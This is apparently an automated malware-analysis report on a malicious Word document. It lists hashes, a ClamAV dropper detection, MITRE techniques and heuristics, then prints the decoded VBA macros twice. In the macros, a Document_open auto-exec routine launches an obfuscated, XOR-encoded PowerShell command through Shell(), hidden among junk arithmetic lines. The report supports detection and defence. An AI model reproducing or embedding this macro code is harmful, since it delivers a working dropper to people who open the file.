Office (OLE) malware analysis — malicious · e24e78ea350aa0b7

MALICIOUS

Office (OLE)

114.8 KB Created: 2018-06-13 21:19:00 Authoring application: Microsoft Office Word First seen: 2018-06-21

MD5: b1a98a7f3844ebca49109c08773d0945 SHA-1: fb651c0b6c3af2d87d5a8dde07c1dcb9c40f4d6e SHA-256: e24e78ea350aa0b7e69bd40ac33c3bc4eb3dc8cdc17a5dc13ef98a14cbecb2ab

222 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The sample is a malicious Office document containing VBA macros. The 'Document_Open' macro triggers a 'Shell()' call, which is highly indicative of downloading and executing a second-stage payload. ClamAV also identified this as 'Doc.Dropper.Agent-6593963-0', further supporting its role as a dropper.

Heuristics 6

ClamAV: Doc.Dropper.Agent-6593963-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-6593963-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code

Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA

Matched line in script

TdzzT = CDbl(rwMNk * CDbl(aizvjG + Int(KHGoA * Rnd(27787)) * UrRYSq * Log(91718 * ObjRhr - EEdIF + Fix(51))))
NwcMUTm = kPfNCm + VBA.Shell(zRwididwGX + Chr(RqJpT + vbKeyP + opmiBSonEN) + "owers" + kXsKkQR + djjuiLSoU + lQiuYJF + HmdLzj, 34216 - 34216)
IcWBOf = Tan(86780)

Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
Matched line in script
```
End Function
Private Sub Document_open()
On Error Resume Next
```
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 11327 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	11327 bytes
SHA-256: `417260c9382c876bc47a1228a2b9b65bda5dd011f07f80d9c02aa5ceae99170e`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "hCphkOIEWrTs" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Function NwcMUTm() On Error Resume Next KvcipG = Tan(90065) HwmUoX = QjqbjS rGzEc = CDbl(tOrKi) WzUMq = qLRILl JYkNG = Tan(85194) bzVGc = CDbl(BEmav * CDbl(IoszdV + Int(uKVzRi * Rnd(9262)) * nNcvh * Log(23593 * UfJii - dCJMYF + Fix(51)))) YpMOcP = Tan(79763) nROjEG = mOKzh tmAhj = CDbl(JfjHEl) JdOHJw = zOPCzm tDZFP = Tan(92112) jPoLu = CDbl(PjHju * CDbl(LDhhz + Int(voYih * Rnd(11227)) * lnjYCz * Log(22541 * ipaXD - wZIjiT + Fix(51)))) skJTn = Tan(2414) Kwpso = YQtAb LIJiP = CDbl(ZvGVI) XfuKo = fQzwYT JrIHVW = Tan(24455) kIPoSv = CDbl(OEiXw * CDbl(wQQvWo + Int(kbzhY * Rnd(29421)) * XIiVO * Log(51429 * CFcvr - UmDjY + Fix(51)))) hFiPA = Tan(25193) BQrtwt = owYfhX INpwj = CDbl(Bzfnu) uiTVPO = RDCBL zqCsZ = Tan(48198) TdzzT = CDbl(rwMNk * CDbl(aizvjG + Int(KHGoA * Rnd(27787)) * UrRYSq * Log(91718 * ObjRhr - EEdIF + Fix(51)))) NwcMUTm = kPfNCm + VBA.Shell(zRwididwGX + Chr(RqJpT + vbKeyP + opmiBSonEN) + "owers" + kXsKkQR + djjuiLSoU + lQiuYJF + HmdLzj, 34216 - 34216) IcWBOf = Tan(86780) jjBmj = JpHZQi zlKmIw = CDbl(fMdaCb) ElSpGJ = lWdaA NKIJI = Tan(63955) LkdVn = CDbl(AHIGLi * CDbl(avfwQ + Int(BdLzS * Rnd(67076)) * fPcwcl * Log(54048 * zrtfbB - JacpIi + Fix(51)))) CSnSc = Tan(90092) zGitSD = iNwPG RzSwLU = CDbl(wzWdq) UrLhoT = MYkKzF hKcZR = Tan(77355) iJYpU = CDbl(YSOOh * CDbl(IaiMZ + Int(zHkjz * Rnd(6962)) * WDBoY * Log(45952 * Tzttt - wZWZis + Fix(51)))) End Function Private Sub Document_open() On Error Resume Next rMabX = Tan(69034) wUivhZ = AazwsB ITSIiE = CDbl(Pvdtw) uYYtE = jzUQKs GOBEp = Tan(73970) qzvkwM = CDbl(tOIAGR * CDbl(lYvGG + Int(XXjmG * Rnd(87974)) * MzkOED * Log(43742 * NfqYX - DGWub + Fix(51)))) lozwjY = Tan(34811) OiuXM = FtHcc TcjrL = CDbl(HtataN) VqtXJ = QEPlG NAcbI = Tan(60031) XNipIz = CDbl(DzoCH * CDbl(wSdRz + Int(Uivjqi * Rnd(42379)) * OdENoi * Log(89231 * YGInj - OJafn + Fix(51)))) NwcMUTm qPiNB = Tan(54371) Jaafs = wAZWo PwcNPp = CDbl(FvFkY) dUSos = WZcHNK pShbd = Tan(93165) zSOkX = CDbl(ESwOD * CDbl(qZhUX + Int(jYRWEw * Rnd(90747)) * BIMLq * Log(63803 * VHsciG - wJIuW + Fix(51)))) YViblh = Tan(88993) LWiiNp = BAEYWA YMjDhw = CDbl(LnaPLm) olSGJF = RYiFfY ijjUs = Tan(39306) VAsjla = CDbl(nrPDn * CDbl(rWUUD + Int(fRznJf * Rnd(6391)) * YbDpob * Log(59301 * iiBwUa - fObZY + Fix(51)))) End Sub Attribute VB_Name = "vTUwHDbVzzOViM" Function kXsKkQR() On Error Resume Next MYAAkQ = CDbl(lIGNsO * CDbl(fFvUNb + Int(awwZlL * Rnd(65858)) * WkjVK * Log(88489 * TKzuQ - iQtwl + Fix(51)))) nHMBE = Tan(75357) mXGoAw = NIWSO mbBawE = CDbl(alWdX) aULhK = Tan(29354) rdllW = KhvfF JjMCjdAXM = "HeLL " + ". ((gV '" + "MDR').Name[3," + "11," + "2]-" + "jOin'')(-" + "JoiN('12_" + "66W103m126>9" UJWbil = CDbl(Rqvwzw * CDbl(VXbnw + Int(sjDTBX * Rnd(57493)) * wClqD * Log(35015 * kjiEtF - RiVmAj + Fix(51)))) LRGQkp = Tan(71515) LHaRjz = AjtuPZ CaGHS = CDbl(nJGtj) zwuCKi = Tan(59558) krsjFj = SYzPXu jJTfEkADI = "7_73" + "m8D21_8W70b77X" + "95W5>" + "71" + "_74b66>77_75S" + "92m8b" + "90S73" + "j70b76m71" + "D6" ZXLAr = CDbl(hFKjM * CDbl(jCijZD + Int(FOkmTz * Rnd(43762)) * EiWDnj * Log(35532 * INTlZ - YzNYzu + Fix(51)))) piTPXp = Tan(10361) dIzlmb = UPsTGv lrDUid = CDbl(ofYFO) mkfZTd = Tan(85943) WSGRJI = nYvzcM DwSVi = "9}19X12X9" + "9X70}126}66" + "b9" + "2b121j8S2" + "1D8b70>" + "77}95_5" + "j71>7" + "4X66W77m75>92" lTQMwN = CDbl(PBMvDs * CDbl(PXlrI + Int(BSzwq * Rnd(751)) * oodpv * Log(15577 * bvjqqD - zWKaM + Fix(51)))) cEdYq = Tan(83227) WWPRu = BJizr iSTTVz = CDbl(raXXAv) zDoQt = Tan(25177) qUouBF = DwpVia YArwZEqItz = "b8j123W" + "81D9" + "1W92X77_69W" + "6}102X77" + "b92X6}127D77>" + "74}107m68_" lkpipm = CDbl(bVdwrW * CDbl(HPRYv + Int(dhsYY * Rnd(17130)) * dfwCu * Log(23717 * AzVbJS - qnwQdV + Fix(51)))) NIhPfw = Tan(99509) bPVsE = XwnaR rQFjl = CDbl(vXbDf) kKFwEc = Tan(33994) MIupO = YntuIv oMBRkM = "65b" + "77W70j92S19_12D" + "99W78}88_90D1" + "12m" + "8W21X" + "8b15_64m92" + "_92S8" FOrACa = CDbl(KzIJt * CDbl(oYGnoR + Int(PApTlw * Rnd(65001)) * dXvzqc * Log(20333 * ZnNnl - KvMjCC + Fix(51)))) KjYjU = Tan(31079) wHEWcj = uQXNww YYOFs = CDbl(haNMC) IPXQnP = Tan(26291) dPhAb = qdptGC ViELzkLfs = "8S18_7j7_90S" + "71W69X73X70>7" + "5>77j75W64b" + "6D75m71b69}7" + "}67}29_" YGdiz = CDbl(imPiS * CDbl(MNvOm + Int(whpYfj * Rnd(53652)) * jXZFL * Log(12016 * sGQpF - OrZqF + Fix(51)))) MvhWqw = Tan(83017) FkAYH = SEkiAj zMAbw = CDbl(iSGNJ) fXSnWQ = Tan(42124) LpTGf = hSipP KjRWGAusJ = "121_" + "122m69" + "j7" + "1W75X96W7>104D6" + "4W9" + "2j92S88j18" + "D7>7j76m77_75W" + "71D9" + "0_73}82>71>70>" + "6X75" mWXbbr = CDbl(RYVJw * CDbl(CzrGR + Int(iBzJS * Rnd(76707)) * qfjYm * Log(8393 * Anasw - JQqvjN + Fix(51)))) mmuGoi = Tan(61072) UCXjF = tzuvlM fnNEna = CDbl(nhAjF) ZzPYBB = Tan(66230) SPYzJq = OLDcEE nPjRD = "D71_69>6j74" + "X90X7}113" + "j69S29b126b29}" + "92W9" + "0W7j104D64X" UXVGfn = CDbl(TTjkzj * CDbl(vCERa + Int(YwPKMA * Rnd(83879)) * mCIiwO * Log(86303 * PWEVoB - PcnZl + Fix(51)))) aDdXb = Tan(32117) VzNnJ = JcIvzI ILtiv = CDbl(hRbFDU) EkcjI = Tan(47321) OniMF = XvzhZa IuiNr = "92m92b" + "88D18_7}7j6" + "5D70_94" + "j65S82b82S73S6" + "}75j7" + "1}69S7>" + "99S27S" + "92b1" + "7S" + "10" znVRS = CDbl(tcIdUE * CDbl(bVSzwi + Int(zpjFn * Rnd(60545)) * CKKKo * Log(39311 * YYdNpm - sQZHV + Fix(51)))) OzSrYC = Tan(69391) VZDcZZ = UkoWkF KDPdm = CDbl(rSzTfk) XLwiH = Tan(40825) DwojJ = RHYJzS zOGjw = "1>1" + "27b7}104D64W92_" + "92>88}18X7D7_95" + "_95m95S6D65D" + "70_92W77S90S6" kXsKkQR = JjMCjdAXM + jJTfEkADI + DwSVi + YArwZEqItz + oMBRkM + ViELzkLfs + KjRWGAusJ + nPjRD + IuiNr + zOGjw End Function Function djjuiLSoU() On Error Resume Next iLCdHP = CDbl(SKluR * CDbl(qrnZi + Int(tzfpcb * Rnd(1115)) * pDjFC * Log(42222 * NdBPMW - RLbavX + Fix(51)))) OaAoZ = Tan(66962) NUNjC = NaSGb CVaBGI = CDbl(Pifrv) oDsTmm = Tan(69920) dOmKSK = iTNBf jAubwraa = "9W77}67S73>92" + "S90j71W" + "70_65_67D6_7" + "5m" + "71_69" + "X7>107b30_17b2" + "9W120S93}27j" iAoqWP = CDbl(CjHYW * CDbl(NqmwOO + Int(iTGKw * Rnd(24513)) * zjmSRf * Log(69718 * ZppvN - tbzCq + Fix(51)))) AZPjhV = Tan(82864) KHbNFO = Bhvjz PudtJ = CDbl(YWwpH) vadfRd = Tan(75259) tAQwIS = rprHH fsvou = "103D73>1" + "13" + "m7" + "b104W64b9" + "2}92W88S18" + "m7_7}80j70X" iAISa = CDbl(UzUXn * CDbl(oYZAF + Int(FLCTCk * Rnd(71202)) * hHzSN * Log(94638 * FCuPz - WbpFas + Fix(51)))) HNUrQk = Tan(9011) oZzfLv = tsWiJv zOzXhM = CDbl(NzCJpI) luYQC = Tan(70537) VilIRi = NOcsuG JJlDhIQ = "5b5b75m25}73j88" + "_75b65" + "D74D69" + "}75m6" + "8>6" + "W80D70j5b5W88j2" + "5S73}65j7j122X1" + "10>" + "109W78b" + "91S92X100W31" rqFIS = CDbl(AkAVf * CDbl(GNarAj + Int(jahhus * Rnd(3039)) * UXLLpN * Log(65703 * wCsKWc - ncLcJ + Fix(51)))) owCjFB = Tan(96449) ozrPP = OpCQCh ILQRb = CDbl(MoJqZX) mIBds = Tan(55304) doHWaD = tEiPr aSltpVF = "X30j7b15b" + "6W123_88D68m65W" + "92S0j15m104W1" + "5}1X" + "19" + "D12X70j70_73S6" + "5S75D122W8D21D8" + "X12m66b103" + "D126D97D73b6}70" + "S77_80X9" LJuNiz = CDbl(RDcAZI * CDbl(nfhGNn + Int(pzfdf * Rnd(13757)) * umNMFd * Log(40707 * OOFOo - kObTmz + Fix(51)))) UlOpw = Tan(38746) Rorctv = LzSVCl MPjzq = CDbl(XRPnT) jZJbk = Tan(23526) iXQSBw = VEiDKt oVDOif = "2}0" + ">25D4b" + "8>27W2" + "7S30m24S16X3" djjuiLSoU = jAubwraa + fsvou + JJlDhIQ + aSltpVF + oVDOif End Function Function lQiuYJF() On Error Resume Next HTAESN = CDbl(wzRdLZ * CDbl(jkzRQ + Int(MVfUQ * Rnd(77538)) * aPsmjP * Log(19872 * qTVhlj - KhZoE + Fix(51)))) rzfBj = Tan(46576) zCziG = kcSzo mofniS = CDbl(jGitw) TZAzX = Tan(14660) UqRbj = jDKzvb MShzrHoiSlC = "1S1b19W12S111" + "W95_78j127b109}" + "78j8}21}8m12X" + "77D70j94_1" + "8b92" pjBhDR = CDbl(okbrj * CDbl(uYiTt + Int(tFsUoi * Rnd(87502)) * MTdGuQ * Log(69008 * OjiJTw - mXKDW + Fix(51)))) uhGKJ = Tan(73465) zBniD = PZECf wLMCKm = CDbl(VGVwTb) uiQNlA = Tan(82748) KBkja = DGwiaX JuhoGXYBti = "X77b69" + "W88_8D3D8W15W" + "116j15_8b3}" + "8m12X70D70m7" + "3_65j75X12" + "2b8m" + "3S8j15m6b77" JjfWbi = CDbl(jqOicm * CDbl(ZjjZL + Int(iBHhEk * Rnd(87660)) * VauQqc * Log(25834 * GBUCoN - nlEMQ + Fix(51)))) wwcCuP = Tan(14067) wCUjzj = hfCNj wSrpzN = CDbl(TSlKC) SmXvl = Tan(57756) ciFIBR = TwAXcN CIjEbXIq = "W80X77W15W1" + "9S78W71j90}77" + ">73}75}64X0W12" + "D9" + "7>121X98W120X" + "90D125W8_65" + "D70X8b1" VOWutw = CDbl(IBSTM * CDbl(pmBFoz + Int(lUzcuJ * Rnd(34707)) * AdhUO * Log(51807 * PwTDO - wGRJBH + Fix(51)))) FSNdF = Tan(35021) IjdNr = sTSSCO BPuzj = CDbl(MIYkww) dSNwN = Tan(11773) nXFml = DnNiSt dwZvNdjrvC = "2W99S78b88" + "X90_1" + "12" + "}1D83}9" + "2}90D81}83W" + "12>99}70W12" WiNbsX = CDbl(OnhbG * CDbl(XRaHhj + Int(jlXDS * Rnd(34356)) * XzfBIq * Log(5377 * MUpLsh - OSaNm + Fix(51)))) OPazb = Tan(646) ZBzBTT = fqijKC kLJIa = CDbl(qQHfS) IvhQD = Tan(30136) ilEGS = qUXXE AIbYLZDX = "6S66>92D1" + "21S" + "6S108S7" + "1X95j70j68" + "m71j" + "73m76m110W" IaKJHd = CDbl(fsMGhC * CDbl(jhjCdl + Int(riDwl * Rnd(70908)) * ddQRU * Log(16683 * OwYzZ - Ktpudi + Fix(51)))) lKLEJV = Tan(45045) qmCBKh = VruHmH rHNWs = CDbl(BPwoM) FfoJhF = Tan(4897) XViLFD = OwsISG ZmhbCaBpTr = "65>68D77}0" + ">12j97W121}98b1" + "20D90>125" + "W6W124m" + "71>" + "123" + "j92m90W" + "65m70X79_0j1>4" + "b8D" QbAzG = CDbl(ISwwuP * CDbl(jizkjN + Int(QwrAi * Rnd(43807)) * FTwBB * Log(42079 * SrSMBS - pXsQLj + Fix(51)))) bhJaD = Tan(54971) WrLaj = JitGRl SkAVj = CDbl(CwAws) jTSLIz = Tan(71638) VNqfYi = fbbwjS coPvkJWmtID = "12j111j95D78>1" + "27W109S78m1S1" + "9S12" + "3X92" + "_73D90D92>5D120" kClvJw = CDbl(rmQCvN * CDbl(MLUvA + Int(NiNhLw * Rnd(10367)) * DCLBZW * Log(88353 * DjowAI - BoWiC + Fix(51)))) MacRTY = Tan(3847) AHRqSw = qXvXRO EkLrpn = CDbl(EBWqdc) Jimpbz = Tan(87108) oGDuF = LspPC fuXSrNmVb = "S90_71" + "m75D7" + "7>9" + "1}91W8D12j11" + "1m95D78b127S109" + "S78}19S74X" BEmVN = CDbl(TodLu * CDbl(oiwHVR + Int(slhIs * Rnd(58319)) * jkcPFp * Log(47104 * GmpNVj - DRnBhQ + Fix(51)))) YiaViw = Tan(74474) uzwcEK = lwmzr wtrOp = CDbl(MNGFXK) rbijF = Tan(96588) JRIvkN = PVrzjH UBZvjqwdwW = "90b77_7" + "3W67j19_85>75}" + "73m92D75D64_" + "83m95>90m" + "65m92b77D5S64" + "S71D91m92" + "_8W" + "12}119S6S109b8" + "0b75}77X88S" + "92>65" lQiuYJF = MShzrHoiSlC + JuhoGXYBti + CIjEbXIq + dwZvNdjrvC + AIbYLZDX + ZmhbCaBpTr + coPvkJWmtID + fuXSrNmVb + UBZvjqwdwW End Function Function HmdLzj() On Error Resume Next MRZzk = CDbl(DbCuf * CDbl(XOYVzz + Int(pTVno * Rnd(87314)) * qLnvn * Log(56442 * zlXLI - njOtbc + Fix(51)))) YdfLw = Tan(24671) qwVHrv = EhvKFA KuqikE = CDbl(NsnGH) wokGZ = Tan(83852) ZZcBJ = IfGFbL rWvwZ = ">71}70S6" + "D10" + "1>77D91D91" + "W7" + "3_79m77j19" + ">85S85'.SPLI" + "t( " + "'WbSDmX}" akwAd = CDbl(GEHDp * CDbl(TZUZA + Int(LHjLc * Rnd(44394)) * JjlmGP * Log(57523 * rlwvMC - tVitN + Fix(51)))) ZBjwYi = Tan(30406) qzCusa = VZqbn nPHbTU = CDbl(URAoL) jtNfb = Tan(98878) bnVioK = NKcjJB GNTowo = "j_>')\|%{ [cH" + "aR] ( $_ -bXOr" + " " + Chr(34) + "0x28" + Chr(34) + " " + ")} ) )" HmdLzj = rWvwZ + GNTowo End Function

SHA-256: 417260c9382c876bc47a1228a2b9b65bda5dd011f07f80d9c02aa5ceae99170e

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "hCphkOIEWrTs"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function NwcMUTm()
On Error Resume Next
KvcipG = Tan(90065)
HwmUoX = QjqbjS
rGzEc = CDbl(tOrKi)
WzUMq = qLRILl
JYkNG = Tan(85194)
bzVGc = CDbl(BEmav * CDbl(IoszdV + Int(uKVzRi * Rnd(9262)) * nNcvh * Log(23593 * UfJii - dCJMYF + Fix(51))))
YpMOcP = Tan(79763)
nROjEG = mOKzh
tmAhj = CDbl(JfjHEl)
JdOHJw = zOPCzm
tDZFP = Tan(92112)
jPoLu = CDbl(PjHju * CDbl(LDhhz + Int(voYih * Rnd(11227)) * lnjYCz * Log(22541 * ipaXD - wZIjiT + Fix(51))))
skJTn = Tan(2414)
Kwpso = YQtAb
LIJiP = CDbl(ZvGVI)
XfuKo = fQzwYT
JrIHVW = Tan(24455)
kIPoSv = CDbl(OEiXw * CDbl(wQQvWo + Int(kbzhY * Rnd(29421)) * XIiVO * Log(51429 * CFcvr - UmDjY + Fix(51))))
hFiPA = Tan(25193)
BQrtwt = owYfhX
INpwj = CDbl(Bzfnu)
uiTVPO = RDCBL
zqCsZ = Tan(48198)
TdzzT = CDbl(rwMNk * CDbl(aizvjG + Int(KHGoA * Rnd(27787)) * UrRYSq * Log(91718 * ObjRhr - EEdIF + Fix(51))))
NwcMUTm = kPfNCm + VBA.Shell(zRwididwGX + Chr(RqJpT + vbKeyP + opmiBSonEN) + "owers" + kXsKkQR + djjuiLSoU + lQiuYJF + HmdLzj, 34216 - 34216)
IcWBOf = Tan(86780)
jjBmj = JpHZQi
zlKmIw = CDbl(fMdaCb)
ElSpGJ = lWdaA
NKIJI = Tan(63955)
LkdVn = CDbl(AHIGLi * CDbl(avfwQ + Int(BdLzS * Rnd(67076)) * fPcwcl * Log(54048 * zrtfbB - JacpIi + Fix(51))))
CSnSc = Tan(90092)
zGitSD = iNwPG
RzSwLU = CDbl(wzWdq)
UrLhoT = MYkKzF
hKcZR = Tan(77355)
iJYpU = CDbl(YSOOh * CDbl(IaiMZ + Int(zHkjz * Rnd(6962)) * WDBoY * Log(45952 * Tzttt - wZWZis + Fix(51))))
End Function
Private Sub Document_open()
On Error Resume Next
rMabX = Tan(69034)
wUivhZ = AazwsB
ITSIiE = CDbl(Pvdtw)
uYYtE = jzUQKs
GOBEp = Tan(73970)
qzvkwM = CDbl(tOIAGR * CDbl(lYvGG + Int(XXjmG * Rnd(87974)) * MzkOED * Log(43742 * NfqYX - DGWub + Fix(51))))
lozwjY = Tan(34811)
OiuXM = FtHcc
TcjrL = CDbl(HtataN)
VqtXJ = QEPlG
NAcbI = Tan(60031)
XNipIz = CDbl(DzoCH * CDbl(wSdRz + Int(Uivjqi * Rnd(42379)) * OdENoi * Log(89231 * YGInj - OJafn + Fix(51))))
NwcMUTm
qPiNB = Tan(54371)
Jaafs = wAZWo
PwcNPp = CDbl(FvFkY)
dUSos = WZcHNK
pShbd = Tan(93165)
zSOkX = CDbl(ESwOD * CDbl(qZhUX + Int(jYRWEw * Rnd(90747)) * BIMLq * Log(63803 * VHsciG - wJIuW + Fix(51))))
YViblh = Tan(88993)
LWiiNp = BAEYWA
YMjDhw = CDbl(LnaPLm)
olSGJF = RYiFfY
ijjUs = Tan(39306)
VAsjla = CDbl(nrPDn * CDbl(rWUUD + Int(fRznJf * Rnd(6391)) * YbDpob * Log(59301 * iiBwUa - fObZY + Fix(51))))
End Sub


Attribute VB_Name = "vTUwHDbVzzOViM"
Function kXsKkQR()
On Error Resume Next
MYAAkQ = CDbl(lIGNsO * CDbl(fFvUNb + Int(awwZlL * Rnd(65858)) * WkjVK * Log(88489 * TKzuQ - iQtwl + Fix(51))))
nHMBE = Tan(75357)
mXGoAw = NIWSO
mbBawE = CDbl(alWdX)
aULhK = Tan(29354)
rdllW = KhvfF
JjMCjdAXM = "HeLL " + ". ((gV '*" + "MDR*').Name[3," + "11," + "2]-" + "jOin'')(-" + "JoiN('12_" + "66W103m126>9"
UJWbil = CDbl(Rqvwzw * CDbl(VXbnw + Int(sjDTBX * Rnd(57493)) * wClqD * Log(35015 * kjiEtF - RiVmAj + Fix(51))))
LRGQkp = Tan(71515)
LHaRjz = AjtuPZ
CaGHS = CDbl(nJGtj)
zwuCKi = Tan(59558)
krsjFj = SYzPXu
jJTfEkADI = "7_73" + "m8D21_8W70b77X" + "95W5>" + "71" + "_74b66>77_75S" + "92m8b" + "90S73" + "j70b76m71" + "D6"
ZXLAr = CDbl(hFKjM * CDbl(jCijZD + Int(FOkmTz * Rnd(43762)) * EiWDnj * Log(35532 * INTlZ - YzNYzu + Fix(51))))
piTPXp = Tan(10361)
dIzlmb = UPsTGv
lrDUid = CDbl(ofYFO)
mkfZTd = Tan(85943)
WSGRJI = nYvzcM
DwSVi = "9}19X12X9" + "9X70}126}66" + "b9" + "2b121j8S2" + "1D8b70>" + "77}95_5" + "j71>7" + "4X66W77m75>92"
lTQMwN = CDbl(PBMvDs * CDbl(PXlrI + Int(BSzwq * Rnd(751)) * oodpv * Log(15577 * bvjqqD - zWKaM + Fix(51))))
cEdYq = Tan(83227)
WWPRu = BJizr
iSTTVz = CDbl(raXXAv)
zDoQt = Tan(25177)
qUouBF = DwpVia
YArwZEqItz = "b8j123W" + "81D9" + "1W92X77_69W" + "6}102X77" + "b92X6}127D77>" + "74}107m68_"
lkpipm = CDbl(bVdwrW * CDbl(HPRYv + Int(dhsYY * Rnd(17130)) * dfwCu * Log(23717 * AzVbJS - qnwQdV + Fix(51))))
NIhPfw = Tan(99509)
bPVsE = XwnaR
rQFjl = CDbl(vXbDf)
kKFwEc = Tan(33994)
MIupO = YntuIv
oMBRkM = "65b" + "77W70j92S19_12D" + "99W78}88_90D1" + "12m" + "8W21X" + "8b15_64m92" + "_92S8"
FOrACa = CDbl(KzIJt * CDbl(oYGnoR + Int(PApTlw * Rnd(65001)) * dXvzqc * Log(20333 * ZnNnl - KvMjCC + Fix(51))))
KjYjU = Tan(31079)
wHEWcj = uQXNww
YYOFs = CDbl(haNMC)
IPXQnP = Tan(26291)
dPhAb = qdptGC
ViELzkLfs = "8S18_7j7_90S" + "71W69X73X70>7" + "5>77j75W64b" + "6D75m71b69}7" + "}67}29_"
YGdiz = CDbl(imPiS * CDbl(MNvOm + Int(whpYfj * Rnd(53652)) * jXZFL * Log(12016 * sGQpF - OrZqF + Fix(51))))
MvhWqw = Tan(83017)
FkAYH = SEkiAj
zMAbw = CDbl(iSGNJ)
fXSnWQ = Tan(42124)
LpTGf = hSipP
KjRWGAusJ = "121_" + "122m69" + "j7" + "1W75X96W7>104D6" + "4W9" + "2j92S88j18" + "D7>7j76m77_75W" + "71D9" + "0_73}82>71>70>" + "6X75"
mWXbbr = CDbl(RYVJw * CDbl(CzrGR + Int(iBzJS * Rnd(76707)) * qfjYm * Log(8393 * Anasw - JQqvjN + Fix(51))))
mmuGoi = Tan(61072)
UCXjF = tzuvlM
fnNEna = CDbl(nhAjF)
ZzPYBB = Tan(66230)
SPYzJq = OLDcEE
nPjRD = "D71_69>6j74" + "X90X7}113" + "j69S29b126b29}" + "92W9" + "0W7j104D64X"
UXVGfn = CDbl(TTjkzj * CDbl(vCERa + Int(YwPKMA * Rnd(83879)) * mCIiwO * Log(86303 * PWEVoB - PcnZl + Fix(51))))
aDdXb = Tan(32117)
VzNnJ = JcIvzI
ILtiv = CDbl(hRbFDU)
EkcjI = Tan(47321)
OniMF = XvzhZa
IuiNr = "92m92b" + "88D18_7}7j6" + "5D70_94" + "j65S82b82S73S6" + "}75j7" + "1}69S7>" + "99S27S" + "92b1" + "7S" + "10"
znVRS = CDbl(tcIdUE * CDbl(bVSzwi + Int(zpjFn * Rnd(60545)) * CKKKo * Log(39311 * YYdNpm - sQZHV + Fix(51))))
OzSrYC = Tan(69391)
VZDcZZ = UkoWkF
KDPdm = CDbl(rSzTfk)
XLwiH = Tan(40825)
DwojJ = RHYJzS
zOGjw = "1>1" + "27b7}104D64W92_" + "92>88}18X7D7_95" + "_95m95S6D65D" + "70_92W77S90S6"
kXsKkQR = JjMCjdAXM + jJTfEkADI + DwSVi + YArwZEqItz + oMBRkM + ViELzkLfs + KjRWGAusJ + nPjRD + IuiNr + zOGjw
End Function
Function djjuiLSoU()
On Error Resume Next
iLCdHP = CDbl(SKluR * CDbl(qrnZi + Int(tzfpcb * Rnd(1115)) * pDjFC * Log(42222 * NdBPMW - RLbavX + Fix(51))))
OaAoZ = Tan(66962)
NUNjC = NaSGb
CVaBGI = CDbl(Pifrv)
oDsTmm = Tan(69920)
dOmKSK = iTNBf
jAubwraa = "9W77}67S73>92" + "S90j71W" + "70_65_67D6_7" + "5m" + "71_69" + "X7>107b30_17b2" + "9W120S93}27j"
iAoqWP = CDbl(CjHYW * CDbl(NqmwOO + Int(iTGKw * Rnd(24513)) * zjmSRf * Log(69718 * ZppvN - tbzCq + Fix(51))))
AZPjhV = Tan(82864)
KHbNFO = Bhvjz
PudtJ = CDbl(YWwpH)
vadfRd = Tan(75259)
tAQwIS = rprHH
fsvou = "103D73>1" + "13" + "m7" + "b104W64b9" + "2}92W88S18" + "m7_7}80j70X"
iAISa = CDbl(UzUXn * CDbl(oYZAF + Int(FLCTCk * Rnd(71202)) * hHzSN * Log(94638 * FCuPz - WbpFas + Fix(51))))
HNUrQk = Tan(9011)
oZzfLv = tsWiJv
zOzXhM = CDbl(NzCJpI)
luYQC = Tan(70537)
VilIRi = NOcsuG
JJlDhIQ = "5b5b75m25}73j88" + "_75b65" + "D74D69" + "}75m6" + "8>6" + "W80D70j5b5W88j2" + "5S73}65j7j122X1" + "10>" + "109W78b" + "91S92X100W31"
rqFIS = CDbl(AkAVf * CDbl(GNarAj + Int(jahhus * Rnd(3039)) * UXLLpN * Log(65703 * wCsKWc - ncLcJ + Fix(51))))
owCjFB = Tan(96449)
ozrPP = OpCQCh
ILQRb = CDbl(MoJqZX)
mIBds = Tan(55304)
doHWaD = tEiPr
aSltpVF = "X30j7b15b" + "6W123_88D68m65W" + "92S0j15m104W1" + "5}1X" + "19" + "D12X70j70_73S6" + "5S75D122W8D21D8" + "X12m66b103" + "D126D97D73b6}70" + "S77_80X9"
LJuNiz = CDbl(RDcAZI * CDbl(nfhGNn + Int(pzfdf * Rnd(13757)) * umNMFd * Log(40707 * OOFOo - kObTmz + Fix(51))))
UlOpw = Tan(38746)
Rorctv = LzSVCl
MPjzq = CDbl(XRPnT)
jZJbk = Tan(23526)
iXQSBw = VEiDKt
oVDOif = "2}0" + ">25D4b" + "8>27W2" + "7S30m24S16X3"
djjuiLSoU = jAubwraa + fsvou + JJlDhIQ + aSltpVF + oVDOif
End Function
Function lQiuYJF()
On Error Resume Next
HTAESN = CDbl(wzRdLZ * CDbl(jkzRQ + Int(MVfUQ * Rnd(77538)) * aPsmjP * Log(19872 * qTVhlj - KhZoE + Fix(51))))
rzfBj = Tan(46576)
zCziG = kcSzo
mofniS = CDbl(jGitw)
TZAzX = Tan(14660)
UqRbj = jDKzvb
MShzrHoiSlC = "1S1b19W12S111" + "W95_78j127b109}" + "78j8}21}8m12X" + "77D70j94_1" + "8b92"
